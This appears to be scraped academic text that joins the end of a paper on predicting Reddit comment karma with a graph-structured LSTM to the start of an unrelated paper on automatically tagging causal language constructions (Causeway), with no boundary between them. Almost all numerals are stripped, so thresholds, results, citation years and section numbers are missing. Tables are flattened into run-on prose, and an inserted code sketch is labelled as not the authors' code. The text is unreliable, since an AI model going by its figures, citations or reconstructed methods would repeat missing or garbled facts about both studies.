for the word level analysis, we classified words in two different ways, again using the politics subreddit. first, we associate words in comments with zero or positive karma. for each word in the vocabulary, we calculate the probability of a single-word comment being level zero using the trained model with a simplified graph structure (a post and a comment) where all the inputs were set to zero except the comment text. the lists of positive-karma and zero-karma words correspond to the words associated with the lowest and highest probability of zero karma, respectively. we identified positive-karma and zero-karma reply words in a similar fashion, using a simplified graph with individual words used as inputs for the reply while predicting the comment karma.

figure : the error between the actual karma level and the karma level predicted by the model using both submission context and language features. negative errors correspond to over-prediction; positive errors correspond to under-prediction.

second, we identified words that may be indicative of comments that are over- and underpredicted by the graph-structured model without text and for which the graph-lstm model with text reduced the error by more than  levels. specifically, we choose those words w in comments having the highest ratio $r = p(w \mid t)/p(w)$, where t indicates an over- or underpredicted comment, subject to minimum occurrence constraints (  for overpredicted comments,  for underpredicted comments). the  words with the highest ratio were chosen for each case and any words in both over- and underpredicted sets were eliminated, leaving  words. again, this was repeated for words in replies to over- vs. underpredicted comments, but with a minimum count threshold of , resulting in  words.

the lists are noisy, similar to what is often found with topic models, and colored by the language of the subreddit community, but a few trends can be observed. looking at the list of words associated with replies to positive-karma comments, we noticed words that indicate humor ("lol", "hilarious"), positive feedback ("like", "right"), and emotion indicators ("!!", swearing). words in comments and replies associated with overpredicted (controversial) cases are related to controversial topics (sexual, regulate, liberals), named political parties, and mentions of downvoting or an indication that the comment has been edited with the word "edit."

since the two sets of lists were generated separately, there are words in the over/under-predicted lists that overlap with the zero/non-zero karma lists (  in the reply lists,  in the comment lists). the majority of the overlap ( / words) is consistent with the intuition that words on the underpredicted list should be associated with positive karma, and words on the overpredicted list might overlap with the zero-karma list.

figure : the mapping of the words in the comments to the shared space using t-sne in the politics subreddit. shown are the words that are highly associated with positive-karma, negative-karma, underpredicted and overpredicted comments.
rather than providing word lists, many neural network studies illustrate trends using word embedding visualization. the embeddings of the words from the union of lists for positive-karma, zero-karma, underpredicted and overpredicted comments and replies were together used to learn a t-sne mapping. the results are plotted for comments in figure , which shows that the words that are associated with underpredicted comments (red) are aligned with positive-karma words (green) for both comment text and text in replies. words associated with overpredicted comments (blue) are more scattered, but they are somewhat more like the zero-karma words (yellow). the trends for words in replies are similar.

table  lists examples of the different error scenarios with the reference karma and predictions of different models (node-independent without text, feedforward graph-lstm with text, and the full bilstm). the first two examples are overpredicted (controversial) cases, where ignoring text leads to a high karma prediction, but the reference is zero. in the first case, the forward model incorrectly predicts high karma because "republican" tends to be associated with positive karma. the model leveraging reply text correctly predicts the low karma. in the second case, the forward model reduces the prediction, but again having the replies is more helpful. the next two cases are examples of underprediction due to small subtrees. example  is incorrectly labeled as level  by the forward and no-text models, but because the responses mention "nice joke" and "accurate analogy," the bidirectional model is able to identify it as level . example  has only one child, but both models using language correctly predict level , probably because the model has learned that references to "colbert" are popular. the next two examples are underpredicted cases from early in the discussion, many of which expressed an opinion that in some way provided multiple perspectives. finally, the last two examples represent instances where neither model successfully identifies a high karma comment, which often involve analogies. unlike the "titanic" analogy, these did not have sufficient cues in the replies.

related work

the problem of predicting popularity in social media platforms has been the subject of several studies. popularity as defined in terms of volume of response has been explored for shares on facebook (cheng et al., ) and twitter (bandari et al., ) and twitter retweets (tan et al., ; zhao et al., ; bi and cho, ). studies on reddit predict karma as popularity (lakkaraju et al., ; jaech et al., ; he et al., ) or as community endorsement (fang et al., ). popularity prediction is a difficult task where many factors can play a role, which is why most prior studies control for specific factors, including topic (tan et al., ; weninger et al., ), timing (tan et al., ; jaech et al., ), and/or comment content (lakkaraju et al., ). controlling for specific factors is useful in understanding the components of a successful post, but it does not reflect a realistic scenario.
studies that do not include such constraints have looked at twitter retweets (bi and cho, ) and reddit karma (he et al., ; fang et al., ). the work in (he et al., ) uses reinforcement learning to identify popular threads to track given the past comment history, so it is learning language cues relevant to high karma but it does not explicitly predict karma. in addition, it models relevance via an inner-product of past and new comment embed- dings, and uses an lstm to model inter-comment dependencies among a collection of comments irre- spective of their sibling-parent relationship, whereas the lstm in our work is over a graph that accounts for this relationship. the work most closely related to our study is fang et al. ( ). the node-independent baseline im- plemented in our study is equivalent to their feed- forward network baseline, but the results are not di- rectly comparable because of differences in training (we use more data) and input features. the most im- portant difference in our approach is the representa- tion of textual context using a bidirectional graph- lstm, including the history behind and responses to a comment. other differences are: i) fang et al. ( ) use an lstm to characterize comments, while our model uses a simple bag-of-words ap- proach, and ii) they learn latent submission context models to determine the relative importance of tex- tual cues, while our approach uses a submission con- text svm to prune low karma comments (ignoring their text). allowing for differences in baselines, we note that the absolute gain in performance from us- ing text features is larger for our model, which rep- resents language context. tree lstms are a modification of sequential lstms that have been proposed for a variety of sentence-level nlp tasks (tai et al., ; zhu et al., ; zhang et al., ; le and zuidema, ). the architecture of tree lstms varies depending on the task. some options include summarizing over the children, adding a separate forget gate for each ex karma comment republicans are fundamentally dishonest. (politics, id: x pcx) that is rape. she was drunk and could not consent. period. any of the supposed evidence otherwise is nothing but victim blaming. (askwomen, id: h pyh) the liberals keep saying the titanic is sinking but my side is feet in the air. (politics, id: upfgl) i miss your show, stephen colbert. (askmen, id: qmpzm) that is terrifying. they were given the orders to bust down the door without notice to the residents, thereby placing themselves in danger. and ultimately, placing the lives of the residents in danger (who would be acting out of fear and self-defense) (politics, id: wzwg ) it’s something, and also would change the way that police unions and state prosecutors work. i don’t fundamentally agree with the move, since it still necessitates abuse by the state, but it’s something. (politics, id: chxr) chickenhawks always talk a big game as long as someone else is doing the fighting. (poli- tics, id: wbgpd) [they] use statistics in the same way that a drunk uses lampposts: for support, rather than illumination. -andrew lang. (politics, id: yc fj) table : example comments and karma level predictions: reference, no text, graph(f), graph. child (tai et al., ), recurrent propagation among siblings (zhang et al., ), or use of stack lstms (dyer et al., ). 
our work differs from these studies in two respects: the tree structure here char- acterizes a discussion rather than a single sentence; and our architecture incorporates both hierarchical and temporal recursions in one lstm unit. conclusion in summary, this paper presents a novel approach for modeling threaded discussions on social media using a graph-structured bidirectional lstm which represents both hierarchical and temporal conversa- tion structure. the propagation of hidden state in- formation in the graph provides a mechanism for representing contextual language, including the his- tory that a comment is responding to as well as the ensuing discussion it spawns. experiments on reddit discussions show that the graph-structured lstm leads to improved results in predicting com- ment popularity compared to a node-independent model. analyses show that the model benefits pre- diction over the extent of the discussion, and that language cues are particularly important for distin- guishing controversial comments from those that are very positively received. responses from even a small number of comments seem to be useful, so it is likely that the bidirectional model would still be useful with a short-time lookahead for early predic- tion of popularity. while we evaluate the model on predicting the popularity of comments in specific forums on red- dit, it can be applied to other social media platforms that maintain a threaded structure or possibly to ci- tation networks. in addition to popularity predic- tion, we expect the model would be useful for other tasks for which the responses to comments are in- formative, such as detecting topic or opinion shift, influence or trolls. with the more fine-grained feed- back increasingly available on social media plat- forms (e.g. laughter, love, anger, tears), it may be possible to distinguish different types of popularity as well as levels, e.g. shared sentiment vs. humor. in this study, the model uses a simple bag-of- words representation of the text in a comment; more sophisticated attention-based models and/or feature engineering may improve performance. in addition, performance of the model on underpredicted com- ments appears to be limited by the pruning mecha- nism that we introduced. it would be useful to ex- plore the tradeoffs of reducing the amount of prun- ing vs. using a more complex classifier for prun- ing. finally, it would be useful to evaluate per- formance using a short window lookahead for re- sponses, rather than the full discussion tree. acknowledgments this paper is based on work supported by the darpa deft program. views expressed are those of the authors and do not reflect the official policy or position of the department of defense or the u.s. government. we thank the reviewers for their help- ful feedback. references roja bandari, sitaram asur, and bernardo huberman. . the pulse of news in social media: forecast- ing popularity. in proc. icwsm. bin bi and junghoo cho. . modeling a retweet network via an adaptive bayesian approach. in proc. www. justin cheng, lada adamic, p. alex dow, jon michael kleinberg, and jure leskovec. . can cascades be predicted? in proc. www. chris dyer, adhiguna kuncoro, miguel ballesteros, and noah a. smith. . recurrent neural network grammars. in proc. naacl. hao fang, hao cheng, and mari ostendorf. . learning latent local conversation modes for predict- ing community endorsement in online discussions. in proc. socialnlp. 
ji he, mari ostendorf, xiaodong he, jianshu chen, jian- feng gao, lihong li, and li deng. . deep reinforcement learning with a combinatorial action space for predicting popular reddit threads. in proc. emnlp. aaron jaech, victoria zayats, hao fang, mari ostendorf, and hannaneh hajishirzi. . talking to the crowd: what do people react to in online discussions? in proc. emnlp. himabindu lakkaraju, julian j. mcauley, and jure leskovec. . what’s in a name? understanding the interplay between titles, content, and communities in social media. in proc. icwsm. phong le and willem zuidema. . compositional distributional semantics with long short term memory. in proc. *sem. tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word represen- tations in vector space. in proc. iclr. kai sheng tai, richard socher, and christopher d man- ning. . improved semantic representations from tree-structured long short-term memory networks. in proc. acl. chenhao tan, lillian lee, and bo pang. . the ef- fect of wording on message propagation: topic- and author-controlled natural experiments on twitter. in proc. acl. the theano development team, rami al-rfou, guil- laume alain, amjad almahairi, christof anger- mueller, dzmitry bahdanau, nicolas ballas, frédéric bastien, justin bayer, anatoly belikov, et al. . theano: a python framework for fast computa- tion of mathematical expressions. arxiv preprint arxiv: . . trang tran and mari ostendorf. . characterizing the language of online communities and its relation to community recognition. in proc. emnlp. tim weninger, xihao avi zhu, and jiawei han. . an exploration of discussion threads in social news sites: a case study of the reddit community. in proc. asonam. matthew d zeiler. . adadelta: an adaptive learning rate method. arxiv preprint arxiv: . . xingxing zhang, liang lu, and mirella lapata. . top-down tree long short-term memory networks. in proc. naacl. qingyuan zhao, murat a erdogdu, hera y he, anand rajaraman, and jure leskovec. . seismic: a self-exciting point process model for predicting tweet popularity. in proc. sigkdd. xiaodan zhu, parinaz sobhani, and hongyu guo. . long short-term memory over recursive structures. in proc. icml. automatically tagging constructions of causation and their slot-fillers jesse dunietz computer science department carnegie mellon university pittsburgh, pa , usa jdunietz@cs.cmu.edu lori levin and jaime carbonell language technologies institute carnegie mellon university pittsburgh, pa , usa {lsl,jgc}@cs.cmu.edu abstract this paper explores extending shallow seman- tic parsing beyond lexical-unit triggers, using causal relations as a test case. semantic pars- ing becomes difficult in the face of the wide variety of linguistic realizations that causation can take on. we therefore base our approach on the concept of constructions from the linguistic paradigm known as construction grammar (cxg). in cxg, a construction is a form/function pairing that can rely on arbi- trary linguistic and semantic features. rather than codifying all aspects of each construc- tion’s form, as some attempts to employ cxg in nlp have done, we propose methods that offload that problem to machine learning. we describe two supervised approaches for tag- ging causal constructions and their arguments. both approaches combine automatically in- duced pattern-matching rules with statistical classifiers that learn the subtler parameters of the constructions. 
our results show that these approaches are promising: they significantly outperform naïve baselines for both construction recognition and cause and effect head matches.

introduction

historically, shallow semantic parsing has focused on tagging predicates expressed by individual lexical units. while this paradigm has been fruitful, tying meaning to lexical units excludes some essential semantic relationships that cannot be captured in such a representation.

one domain that highlights the problem is causal relations. causation can be expressed in a tremendous variety of linguistic forms (wolff et al., ). as exemplified in table , possibilities include verbs ( , ), prepositions/conjunctions ( , , ), adjectives ( ), and much more complex expressions. some of these trickier cases can be handled as idiomatic multi-word expressions (mwes; ). others ( , ), however, are more structured than typical mwes: they depend on particular configurations of syntactic relations and slot-fillers, placing them closer to the grammatical end of the continuum of lexicon and grammar.

table : examples of causal language, reflecting the annotation scheme described in § (with connectives in bold, causes in small caps, and effects in italics).
1. this bill promotes consolidation and cooperation among regulatory agencies.
2. such swelling can impede breathing.
3. we don't have much time, so let's move quickly.
4. she's mad because i hid the car keys.
5. he died from a blocked artery.
6. making money is contingent on finding a good-paying job.
7. this decision opens the way for much broader application of the law.
8. for market discipline to work, banks cannot expect to be bailed out.
9. judy's comments were so offensive that i left.

this diversity presents a problem for most semantic parsers, which inherit the restrictions of the representational schemes they are based on. many semantic annotation schemes limit themselves to the argument structures of particular word classes. for example, the penn discourse treebank (pdtb; prasad et al., ) includes only conjunctions and adverbials as connectives, and propbank (palmer et al., ) and verbnet (schuler, ) focus on verb arguments. framenet (baker et al., ; fillmore, ) is less restrictive, allowing many parts of speech as triggers.

most importantly, though, all these representations share the fundamental simplifying assumption that the basic linguistic carrier of meaning is the lexical unit. some (e.g., pdtb and framenet) allow mwes as lexical units, and much work has been done on detecting and interpreting mwes (see baldwin and kim, ). but even these schemes overlook essential linguistic elements that encode meanings. in example , for instance, a lexical unit approach would have to treat so as encoding the causal relationship, when in fact so merely intensifies the adjective; it is the combination of so and the finite clausal complement that indicates causality.

a more general approach can be found in the principles of construction grammar (cxg; fillmore et al., ; goldberg, ). cxg posits that the fundamental units of language are constructions – pairings of meanings with arbitrarily complex linguistic forms.
these forms are often produc- tive, consisting of some fixed elements combined with some open slots for semantic arguments. the form/meaning pairings can be as simple as those in traditional lexical semantics. the verb push, for in- stance, is paired with the meaning force to move, and the verb takes two linguistic arguments (sub- ject and object) corresponding to the two semantic arguments (pusher and pushee). but in cxg, the meaning-bearing forms can be much more complex: so x that y is a single construction, paired with the meaning x to an extreme that causes y. the cxg paradigm can anchor semantic interpre- tations to any constellation of surface forms, making it potentially invaluable for computational semantics. even as it has grown in prominence in linguistics, however, cxg has received relatively little attention in nlp. this is partly because the usual approach to operationalizing cxg is to rebuild the entire nlp pipeline to be “constructions all the way down” – to pdtb does include a catch-all altlex category that captures some additional constructions. however, these phrases are very unpredictable, as they include many words beyond the linguistic triggers. they are also restricted to relations between sentences. explicitly model the interactions and inheritance re- lationships between constructions that produce the final utterance and meaning. here, we take a different approach. instead of “constructions all the way down,” we propose a “con- structions on top” methodology: we use a con- ventional nlp pipeline for pos tagging, parsing, and so on, but add a layer for constructional phenomena that directly carry meaning. rather than specifying by hand the constraints and properties that charac- terize each construction, we allow machine learning algorithms to learn these characteristics. causal relations present an ideal testbed for this ap- proach. as noted above, causal relations are realized in extremely diverse ways, demanding an operational- ized concept of constructions. recognizing causal relations also requires a combination of linguistic analysis and broader world knowledge. additionally, causal relations are ubiquitous, both in our thinking and in our language (see, e.g., conrath et al., ). recognizing these relations is thus invaluable for many semantics-oriented applications, including tex- tual entailment and question answering (especially for “why” questions). they are especially helpful for domain-specific applications such as finance, politics, and biology (see, e.g., berant et al., ), where ex- tracting cause and effect relationships can help drive decision-making. more general applications like ma- chine translation and summarization, which ought to preserve stated causal relationships, can also benefit. in the remainder of this paper, we suggest two related approaches for tagging causal constructions and their arguments. we first review an annotation scheme for causal language and present a new corpus annotated using that scheme (§ ). we then define the task of tagging causal language, casting it as a construction recognition problem (§ ). because it is so hard to identify the relevant components of a construction (tenses, grammatical relations, etc.), the scheme and task do not explicitly include all of these elements. we instead tag the words that participate in a causal construction as a proxy for that construction. 
we leave it to annotators (when humans are annotat- ing) or machine learning (during automated tagging) to assess when the full constellation of constructional elements is present. next, we present causeway-l and causeway-s, two versions of a pipeline for performing this task, and compare the two approaches. both approaches use automatically induced patterns, either syntactic (§ . ) or lexical (§ . ), to find possible lexical trig- gers of causal constructions, as well as their likely arguments. they then apply a mix of construction- specific classifiers and construction-independent clas- sifiers to determine when causal constructions are truly present. we report on three sets of experiments (§ ) assessing the two systems’ performance, the im- pacts of various design features, and the effects of parsing errors. the results indicate the viability of the approach, and point to further work needed to improve construction recognition (§ ). causal language annotation scheme and corpus causation is a slippery notion (see schaffer, ), so the parameters of annotating causal language require careful definition. we follow the annotation scheme of dunietz et al. ( ), which we now briefly review. . causal language annotation scheme the scheme of dunietz et al. ( ) focuses specifi- cally on causal language – language used to appeal to psychological notions of cause and effect. it is not concerned with what causal relationships hold in the real world; rather, it represents what causal relationships are asserted by the text. for example, cancer causes smoking states a false causation, but it would nonetheless be annotated. on the other hand, the bacon pizza is delicious would not be annotated, even though bacon may in fact cause deliciousness, because the causal relationship is not stated. the scheme defines causal language as any con- struction which presents one event, state, action, or entity as promoting or hindering another, and which includes at least one lexical trigger. for each instance of causal language, up to three spans are annotated: • the causal connective (required) – the lexical items in the construction signaling the causal rela- tionship (e.g., because of ). the connective anno- tation includes all words whose lemmas appear in every instance of the construction. this excludes elements that can be absent, such as most copu- las, or classes of interchangeable words, such as determiners, whose lemmas can vary between in- stances. • the cause – generally a full clause or phrase ex- pressing an event or state of affairs (e.g., i attended because joan was the honoree). when an actor – but no action – is presented as the cause (e.g., i prevented a fire.), the actor is annotated as the cause. • the effect – also generally an event or state of affairs, expressed as a complete clause or phrase (e.g., i attended because of joan.). the cause and effect spans may be absent, e.g., in a passive or infinitive. several examples, with connectives, causes, and effects annotated, are shown in table . the scheme permits the connective to be discon- tinuous and arbitrarily complex (e.g., a necessary condition of or if is to ). annotators together established an informal “constructicon” to guide their decisions about what word patterns should be con- sidered connectives. note that the connective is not synonymous with the construction itself; rather, it is a lexical indicator of the presence of the construction. 
as noted above, we take the construction proper to in- clude the relevant grammatical relations, constraints on argument type, etc. to address causal language as independently as possible from other phenomena, and to circumscribe the scope of the annotations, several types of relation- ships are excluded: • causal relationships with no lexical trigger – e.g., john went home early; he felt ill. • connectives that incorporate a means or result – this includes lexical causatives such as kill (cause to die) and convince (cause via persuasion). only connectives denoting pure causation (e.g., cause, prevent, because) are annotated. • connectives that assert an unspecified causal relationship – e.g., the earthquakes have been linked to fracking. • temporal language – e.g., after i drank some wa- ter, i felt much better. (relations like temporal or- der are often repurposed to express causality. we are currently developing an enhanced annotation scheme and corpus that accounts for such cases.) additionally, for practical reasons, arguments are only annotated when they appear within the same sentence as the connective. the scheme labels four different types of causa- tion: consequence, motivation, purpose, and inference. it also distinguishes positive causation (facilitate) from negative causation (inhibit). our algorithms do not currently make these distinc- tions, so we do not delve into them here. of course, this scheme does not supply everything a full natural language understanding pipeline would need regarding causal relationships. the scheme does not unpack the argument spans into a richer semantic representation. it also does not cover predi- cates that imply causation, such as kill or convince. instead, it follows in the tradition of shallow semantic parsing, imposing a canonical representation for cer- tain predicates that abstracts away from the language used to convey them. the shallow semantic pars- ing paradigm enables many applications that only require relevant text spans. it is also the first step towards a full semantic interpretation that includes interpretations of the arguments. . the because annotated corpus based on the data and annotation scheme from duni- etz et al. ( ), we developed the bank of effects and causes stated explicitly (because), which was used for all experiments below. it consists of three sets of exhaustively annotated documents: • randomly selected articles from the year in the washington section of the new york times corpus (sandhaus, ) • documents randomly selected from sections – of the penn treebank (marcus et al., ) • sentences transcribed from congress’ dodd- frank hearings, taken from the nlp unshared task in poliinformatics (smith et al., ) the corpus contains a total of sentences, among which are labeled instances of causal language. of these, or %, include both cause and effect arguments. many of these documents are the same ones that were annotated in dunietz et al. ( ), with mi- nor corrections. about % of the data is new, but we excluded wsj documents that were either earnings re- ports or corporate leadership/structure announcements, as both tended to be merely short lists of names/numbers. the remaining sentences and documents were not annotated due to constraints on available annotation effort. partial overlap: allowed excluded connectives (f ) . . degrees (κ) . . causation types (κ) . . argument spans (f ) . . argument labels (κ) . . table : inter-annotator agreement results for the be- cause corpus. 
the difference between the two columns is that for the left column, we counted two annotation spans as a match if at least a quarter of the larger one overlapped with the smaller; for the right column, we re- quired an exact match. κ scores indicate cohen’s kappa. each κ score was calculated only for spans that agreed (e.g., degrees were only compared for matching connec- tive spans). corpus connectivetypes connective tokens pdtb . % . % mirza and tonelli ( ) . % . % framenet . % . % table : percentages of the causal connectives in be- cause that would be partially or fully annotatable under other annotation schemes. connectives were grouped into types by the sequence of connective lemmas. annotated by the same annotators. the scheme’s inter-annotator agreement metrics are reproduced in table . many of the causal constructions in because would be harder to annotate in other schemes, as shown in table . we computed these statistics by looking up each connective in the other schemes’ lexica. framenet captures many more connectives than the others, but it often represents them in frames that are not linked to causality, making comparison difficult. the causal language tagging task we define the task of tagging causal language to be reproducing a subset of the annotations of the because annotation scheme. we split this task into two parts: . connective discovery, in which the spans of causal connectives are annotated. a connective span may be any set of tokens from the sentence. this can be thought of as recognizing instantia- tions of causal constructions. . argument identification (or argument id), in which cause and effect spans are identified for each causal connective. this can be thought of as identifying the causal construction’s slot-fillers. we assume as input a set of sentences, each with pos tags, lemmas, ner tags, and a syntactic parse in the universal dependencies (ud; nivre et al., ) scheme, all obtained from version . . of the stan- ford parser (klein and manning, ). this task is defined in terms of text spans. still, to achieve a high score on it, a tagger must respond to the meaning of the construction and arguments in context, just as annotators do. this may be achieved by analyzing indirect cues that correlate with mean- ing, such as lexical information, dependency labels, and tense/aspect/modality information. compared to the annotation scheme, the task is limited in two important ways: first, we do not dis- tinguish between types or degrees of causation; and second, we only tag instances where both the cause and the effect are present. (even for connective dis- covery, we only evaluate on instances where both arguments are present, and our algorithms check for spans or tokens that at least could be arguments.) we leave addressing both limitations to future work. nonetheless, this task is more difficult than it may appear. two of the reasons for this are familiar is- sues in nlp. first, there is a surprisingly long tail of causal constructions (as we finished annotating, we we use the non-collapsed enhanced dependency represen- tation. we could have selected a parser that produces both syn- tactic and semantic structures, such as the english resource grammar (erg; copestake and flickinger, ) or another hpsg variant. though these parsers can produce impressively sophisticated analyses, we elected to use dependency parsers because they proved significantly more robust; there were many sentences in our corpus that we could not parse with erg. 
how- ever, incorporating semantic information from such a system when it is available would be an interesting extension for future work. another possible input would have been semantic role label- ing (srl) tags. srl tags could not form the basis of our system the way syntactic relations can, because they only apply to lim- ited classes of words (primarily verbs). also, by examining syntactic relations and undoing passives (see §), we get most of the information srl would provide. still, we may include srl tags as classification features in the future. would still encounter a new construction every – documents). second, recognizing these constructions inherits all the difficulties of word sense disambigua- tion; every one of the connectives in table except examples and has a non-causal meaning. ( can be used in a discourse sense – roughly, i’m saying this because. . . .) the third reason arises from the com- plexity of causal constructions. because we allow arbitrarily complex connectives, the space of possible triggers is all subsets of words in the sentence. thus, the task demands an approach that can trim this space down to a manageable size. causeway: causal construction tagging methods causeway is a system that performs this causal lan- guage tagging task. we implemented two versions of causeway: causeway-s, based on syntactic patterns, and causeway-l, based on lexical patterns. (these are both simple techniques; see § for some more complex possibilities we are considering for future work.) each technique is implemented as a pipeline with four stages: . pattern-based tentative connective discovery. both techniques extract lexical or lexico-syntactic patterns for connectives from the training data. these patterns are then matched against each test sentence to find tokens that may be participating in a causal construction. . argument identification, which marks the cause and effect spans. . a statistical filter to remove false matches. . a constraint-based filter to remove redundant connectives. smaller connectives like to (which is causal in sentences like i left to get lunch) are usu- ally spurious when a larger connective includes the same word, like cause x to y . when a larger and a smaller connective both make it through stage together, we remove the smaller one. because argument id is done before filtering, the arguments output by stage do not quite represent the cause and effect arguments of a causal instance. following schneider et al. ( ), because considers the “in order to” usage of the infinitive to to carry lexical meaning beyond just marking an infinitival clause. worry/vbp i/prp nsubj care/vbp i/prp nsubj because/in mark advcl figure : a ud parse for the sentence i worry because i care, with the tree fragment corresponding to the because construction bolded. bolded nodes with unbolded text indicate the slots in the construction. (care is a dependent of worry in keeping with the ud design philosophy, which maximizes dependencies between content words.) rather, they represent what the cause and effect spans would be if the connective is indeed causal. (for the same reason, even connective discovery is not complete until the end of the pipeline.) of course, we lack gold-standard arguments for false-positive connectives. we therefore train argument id only on instances whose connectives are correct. we now describe each of the two versions of this pipeline in turn, focusing on their differing first and second stages. we also elaborate on the design of the classifier. 
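as a concrete illustration of the final pipeline stage (the constraint-based filter), the sketch below drops any candidate connective whose tokens overlap with a larger surviving connective in the same sentence. the data layout (a set of token indices per candidate) and the function name are our own assumptions, not the causeway code.

```python
def remove_redundant_connectives(candidates):
    """Keep only the largest of any overlapping candidate connectives.

    candidates: list of dicts, each with a 'connective_tokens' entry holding the
    set of token indices of that candidate's connective (illustrative field name).
    """
    kept = []
    # Visit larger connectives first so they can suppress smaller overlapping ones,
    # e.g. a bare 'to' is dropped when 'cause ... to' also survived filtering.
    for cand in sorted(candidates, key=lambda c: len(c["connective_tokens"]), reverse=True):
        if any(cand["connective_tokens"] & k["connective_tokens"] for k in kept):
            continue
        kept.append(cand)
    return kept
```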
throughout, we take the head of a span to be the token that is highest in the dependency tree. for tokens that are equally high (e.g., if the parser erroneously splits a phrase into two sister subtrees), we prefer verbs or post-copular nouns over other nouns, and nouns over other parts of speech. . causeway-s: syntax-based tagging the syntax-based approach relies on a simple intu- ition: each causal construction corresponds, at least in part, to a fragment of a dependency tree, where several nodes’ lemmas and pos tags are fixed (see figure ). accordingly, the first stage of causeway-s induces lexico-syntactic patterns from the training data. at test time, it matches the patterns against new dependency trees to identify possible connectives and the putative heads of their cause and effect argu- ments. the second stage then expands these heads into complete argument spans. tregex pattern matching for pattern matching, we use tregex (levy and andrew, ), a grep-inspired utility for matching patterns against syntax trees. during training, the sys- tem examines each causal language instance, gener- ating a tregex pattern that will match tree fragments with the same connective and argument structure. in the example from figure , the generated pattern would match any tree meeting three conditions: • some token t has a child t via a dependency labeled advcl • t has a child t via a dependency labeled mark • t has the lemma because and a pos tag of in at test time, tregex matches these extracted pat- terns against the test sentences. continuing with the same example, we would recover t as the effect head, t as the cause head, and {t } as the connective. tregex is designed for phrase-structure trees, so we transform each dependency tree into a ptb-like parenthetical notation (see levin et al., ). patterns involving verbs vary systematically: the verbs can become passives or verbal modifiers (e.g., the disaster averted last week), which changes the ud dependency relationships. to generalize across these, we crafted a set of scripts for tsurgeon (levy and andrew, ), a tree-transformation utility built on tregex. the scripts normalize passive verbs and past participial modifiers into their active forms. each sentence is transformed before pattern extrac- tion or matching. tregex pattern extraction the algorithm for extracting tregex patterns first preprocesses all training sentences with tsurgeon. next, for each causal instance with both a cause and an effect, it uses the dreyfus-wagner algorithm (dreyfus and wagner, ) to find a minimum- weight subtree of the dependency graph that includes the connective, the cause head, and the effect head. the algorithm uses this to build the pattern: for each subtree edge rel(a,b), the pattern requires that the test sentence include nodes related by a dependency labeled as rel. if a or b is a connective word, then the pattern also checks for its lemma and pos in the test sentence nodes. patterns with more than six non-argument, non-connective nodes are discarded as parse errors or otherwise ungeneralizable flukes. the graph for dreyfus-wagner includes a directed the actual tregex pattern encoding these conditions is: /ˆbecause [ - ]+$/=connective < /ˆin.*/ < mark >(/.* [ - ]+/=cause < advcl >(/.* [ - ]+/=effect)). edge for each dependency in the sentence’s parse tree. for each edge, a back-edge of equal weight is added, unless the back-edge already exists (which ud allows). 
this allows dreyfus-wagner to find a subtree even when it has to follow an arc in reverse to do so. most edges have unit weight. however, for nodes with multiple parents (which ud also allows), the algorithm would often choose the wrong dependency path, leading to poor generalization. accordingly, on paths of the form x xcomp−−−→ y csubj | nsubj−−−−−−−→ z (where xcomp indicates open clausal complements), edge costs are slightly decreased. this helps the algorithm prefer the xcomp path connecting x, y, and z, rather than a path such as x nsubj−−−→ z nsubj←−−− y. similarly, acl (adjectival clause) and expl (expletive) edges are slightly penalized. syntax-based argument identification each syntactic pattern inherently encodes the posi- tions in the tree of the cause and effect heads. thus, matching these patterns is the first step of argument id, in addition to (tentative) connective discovery. the second step of argument id is to expand the ar- gument heads into complete spans. in general, most syntactic dependents of an argument’s head are in- cluded in its span. there are two exceptions: . connective words. under the ud scheme, words that form part of the connective sometimes appear as dependents of the argument head. for example, in a prevents b from c, from appears as a depen- dent of c, but it is really part of the construction for the verb prevent. following the annotation scheme, we therefore exclude such connective words (and any of their dependents) from the ar- gument span. . words below the head of the other argument. for example, in a because b, b will be a depen- dent of a (see figure ). obviously, however, it should not be included in the cause span. . causeway-l: lexical pattern-based tagging syntactic parsers often make mistakes, which be- comes especially relevant for syntactic patterns that examine multiple dependencies. this is particularly problematic for the syntax-based pipeline, for which parse errors, either in training or at test time, can prevent patterns from matching. additionally, the exact syntactic relations present in a given instance may be altered by the presence of other constructions. for example, if a verb appears as a complement of another verb, the path to the subject will have an additional dependency link. we therefore implemented a second algorithm, causeway-l, that performs connective discovery based on the sequence of word lemmas and parts of speech: instead of extracting and matching parse patterns, it extracts and matches regular expressions. it then uses a conditional random field to label the argument spans, using features from the parse in a more probabilistic way. connective discovery with regular expression patterns at training time, we generate regular expressions that will match sequences of connective and argu- ment lemmas. the regexes also make sure that there are tokens in the correct lexical positions for argu- ments. for instance, upon seeing an example like a because b, it would generate a pattern that matches any sequence of lemmas (the effect range), followed by the lemma because with pos tag in (the connec- tive), followed by any other sequence of lemmas (the cause range). each subpattern is given its own cap- turing group in the regular expression. at test time, each new sentence is turned into a string of lemmas with pos tags for matching. matching lemmas can be recovered from the capturing groups. 
argument identification with a crf unlike syntactic patterns, regular expressions can- not pinpoint the cause and effect arguments; they can only give ranges within which those arguments must appear. thus, the argument id stage for this pipeline starts with much less information. we treat the task of argument id as a sequence labeling problem: given a particular regex-derived connective, the system must identify which tokens are in the cause, which are in the effect, and which are neither. we use a standard linear-chain crf for this task, implemented with the crfsuite library. the actual regular expression that encodes this is: (ˆ| )([\s]+ )+?(because/in) ([\s]+ )+?. http://www.chokkan.org/software/ • the lemma of wi • the pos tag of wi • whether wi ∈ c • the dependency parse path between wi and the token in c that is closest in the parse tree • the absolute lexical distance between wi and the lexically closest token in c • the signed lexical distance between wi and the lexically closest token in c • whether wi is in the parse tree (false for punctua- tion and several other non-argument token types) • the regex pattern that matched c • the cross-product of the regex pattern feature and the parse path feature • the position of wi relative to c • whether the lemma of wi is alphanumeric table : features used for crf argument id. for each pos- sible connective c (a set of tokens), features are extracted from each word wi in the sentence. all non-numeric fea- tures are binarized. the features for argument id are listed in table . . voting classifier for filtering the pattern-matching stage overgenerates for two reasons. first, due to ambiguity of both words and constructions, not all instances of a given pattern are actually causal. since, for example, has both causal and temporal senses, which are not distinguished either lexically or syntactically. second, the patterns do not filter for important constructional elements like tense and modality (e.g., example in table requires modality of necessity in the cause). thus, pattern matching alone would yield high recall but low precision. to account for this, the final stage of both pipelines is a filter that determines whether each possible con- nective instance, along with its arguments, is in fact being used in a causal construction. this classification task is somewhat, but not en- tirely, heterogeneous. some aspects are universal – there are regularities in what typically causes what – crfsuite/. we use the python-crfsuite wrapper (https: //github.com/tpeng/python-crfsuite/). for this purpose, we represent the tense of a verb as the pos of the verb plus the string of auxiliaries attached to it. the tense of a non-verb is null. for copulas, both the pos of the copula and the pos of its object are included. 
